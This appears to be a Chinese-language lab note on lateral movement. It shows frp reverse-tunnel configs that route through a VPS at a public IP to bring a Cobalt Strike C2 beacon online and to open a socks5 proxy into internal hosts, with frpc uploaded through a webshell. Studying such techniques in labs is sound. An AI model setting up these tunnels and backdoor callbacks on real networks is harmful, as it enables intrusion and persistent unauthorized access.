前情提要
1、实现湖北内网(192.168.158.128)控制北京内网(192.168.157.128;192.168.159.129)
2、实现湖北内网探针北京内网,信息收集(socks节点,端口映射)
nps
vps 上,./vps
frp
C2上线157.128
1、vps 上 ./frps -c frps.toml
2、158.128上修改 frpc.toml
frpc.toml:
serverAddr = "62.234.24.115"
serverPort = 7000
[[proxies]]
name = "test-tcp"
type = "tcp"
localIP = "192.168.158.128"
localPort = 5555
remotePort = 6666
解释:
serverAddr 是服务端地址
serverPort 是服务端用于连接通讯的监听端口
remotePort 是 vps 的端口;localPort 是本机的端口
将 vps:6666 的数据转发给 158.128:5555
3、158.128 上 ./frpc -c frpc.toml,和 vps 服务端建立连接,并进行转发
4、CS上开启 vps:6666 + 158.128:5555(生成后门用)监听
5、C2上线
157.128上创建 socks 节点
1、如果可以C2上线,可以直接在 cs 上创建 socks 节点,代理设置 监听器:port
2、不 C2 上线,利用 webshell 上传frpc.exe,frpc.toml
frpc.toml:
[common]
server_addr = "62.234.24.115"
server_port = 7000
tls_enable = true
pool_count = 5
[plugin_socks]
type = tcp
remote_port = 6000
plugin = socks5
plugin_user = admin
plugin_passwd = admin@123
use_encryption = true
use_compression = true
解释:
通用配置节,每个 frpc 配置文件必须有这个节
服务端地址
服务端用于连接通讯的监听端口
remotePort 是 vps 的端口
将 vps:6000 设置为socks 节点,代理走 vps:6000 相当于
走 157.128
3、158.128 上 frpc.exe -c frpc.toml
4、proxifier 设置代理服务器,成功代理
